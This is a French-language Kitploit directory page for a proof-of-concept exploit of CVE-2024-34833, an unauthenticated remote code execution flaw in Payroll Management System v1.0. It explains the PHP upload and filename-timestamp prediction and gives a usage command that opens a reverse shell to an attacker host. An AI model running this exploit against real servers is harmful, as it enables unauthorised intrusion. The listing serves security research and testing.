Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-34833-payroll-management-system-rce — Exploit d'exécution de code à distance non authentifié pour Payroll Management System v1.0 via un téléchargement de fichier malveillant, avec prédiction de nom de fichier et capacité de shell inverse. | Kitploit
Outils/GitHubGitHub/shellunease/cve-2024-34833-payroll-management-system-rce
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubshellunease/cve-2024-34833-payroll-management-system-rce

CVE-2024-34833-payroll-management-system-rce

Exploit d'exécution de code à distance non authentifié pour Payroll Management System v1.0 via un téléchargement de fichier malveillant, avec prédiction de nom de fichier et capacité de shell inverse.

Voir le dépôt
1il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-34833 Système de gestion de paie RCE (Non authentifié) PoC

RCE via téléchargement de fichier pour https://www.sourcecodester.com/php/14475/payroll-management-system-using-phpmysql-source-code.html. Les noms de fichiers sont précédés d'un horodatage avec une précision à la minute. Le script tente de deviner le nom du fichier en utilisant l'horodatage de la minute courante, précédente et suivante.

Description de la vulnérabilité

Payroll Management System v1.0 permet aux utilisateurs de télécharger des images via la page "save_settings". Un attaquant non authentifié peut exploiter cette fonctionnalité pour télécharger à la place un fichier PHP malveillant. Les fichiers téléchargés sont stockés dans un dossier accessible publiquement et un horodatage avec une précision à la minute est ajouté à leurs noms de fichiers, lequel peut être facilement calculé. L'exploitation réussie de cette vulnérabilité permet d'exécuter du code arbitraire en tant qu'utilisateur exécutant le serveur web.

Exemple d'utilisation

root@kitploit:~
python3 exploit.py -rhost somewebsite.com -rport 443 -lhost 192.168.22.23 -lport 443 -https

Vidéo d'exemple

Télécharger l’outil